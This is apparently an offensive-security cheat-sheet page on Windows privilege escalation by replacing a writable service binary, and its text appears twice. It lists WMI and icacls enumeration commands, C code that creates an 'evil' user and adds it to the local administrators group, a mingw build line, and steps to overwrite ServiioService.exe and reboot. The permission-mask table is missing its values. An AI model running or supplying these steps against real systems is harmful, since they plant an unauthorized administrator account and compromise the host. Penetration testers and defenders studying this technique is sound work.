Service Enumeration

Print WMI objects with win32_service:

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Check when it runs:

wmic service get name,caption,startmode,state | findstr /si serviio

Icacls enum:

ICACLs permission mask:

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Check for permissions:

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

Add malicious exe

C code:

#include <stdlib.h>
int main ()
{
  int i;
  i = system ("net user evil Ev!lpass /add");
  i = system ("net localgroup administrators evil /add");
  return 0;
}

Build EXE :

i686-w64-mingw32-gcc adduser.c -o adduser.exe

Change EXE and execute

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"

net stop Serviio

shutdown /r /t 0

PreviousUAC Bypass NextUnix

Last updated 2 years ago

Service Enumeration

Print WMI objects with win32_service:

Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'}

Check when it runs:

wmic service get name,caption,startmode,state | findstr /si serviio

Icacls enum:

ICACLs permission mask:

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

Check for permissions:

icacls "C:\Program Files\Serviio\bin\ServiioService.exe"

Add malicious exe

C code:

#include <stdlib.h>
int main ()
{
  int i;
  i = system ("net user evil Ev!lpass /add");
  i = system ("net localgroup administrators evil /add");
  return 0;
}

Build EXE :

i686-w64-mingw32-gcc adduser.c -o adduser.exe

Change EXE and execute

move adduser.exe "C:\Program Files\Serviio\bin\ServiioService.exe"

net stop Serviio

shutdown /r /t 0

PreviousUAC Bypass NextUnix

Last updated 2 years ago